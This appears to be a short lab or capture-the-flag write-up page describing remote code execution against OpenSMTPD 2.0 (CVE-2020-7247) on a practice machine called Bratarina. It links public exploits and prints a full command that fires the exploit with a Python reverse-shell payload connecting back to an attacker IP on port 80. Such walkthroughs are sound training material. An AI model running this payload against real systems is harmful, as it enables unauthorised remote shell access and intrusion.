# Exploitation

![](https://3908701329-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FUlbUGvFgNk6Fya0ukCCt%2Fuploads%2FwJGSFR4tUY4vKZ1kIlDe%2F2022-08-10_12-15.png?alt=media\&token=06536a08-8fd0-4787-8cee-ad530275f421)

![](https://3908701329-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FUlbUGvFgNk6Fya0ukCCt%2Fuploads%2FfltAsb9dIH0WsgDlHnhH%2F2022-08-10_12-16.png?alt=media\&token=de9b1954-b6e0-4a08-a703-ecd628e771b6)

According to our scans Bratarina is running OpenSMTPD 2.0 which makes this machine a good candidate for the RCE. 

{% embed url="<https://www.exploit-db.com/exploits/47984>" %}

{% embed url="<https://github.com/QTranspose/CVE-2020-7247-exploit>" %}

In order to get the exploit to work we had to use the principle of using the same thing, just in different ways.&#x20;

![](https://3908701329-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FUlbUGvFgNk6Fya0ukCCt%2Fuploads%2Fkj6Uq1lF9UeWyTPFmAtZ%2F2022-08-10_12-30.png?alt=media\&token=93b3cb37-ea68-4ac9-9b2d-2f11509df406)

I ran the following command to get a reverse shell.&#x20;

```
ython3 /usr/share/exploitdb/exploits/linux/remote/47984.py 192.168.242.71 25 'python -c "import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"192.168.49.242\",80));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn(\"/bin/bash\")"'
```

I also found this exploit from github which seems to be really good as well.&#x20;

![](https://3908701329-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FUlbUGvFgNk6Fya0ukCCt%2Fuploads%2F84UMnvCTzxh8hgmLFPSO%2F2022-08-10_12-31.png?alt=media\&token=59a97263-073c-48a5-a8ea-b4f1498c014d)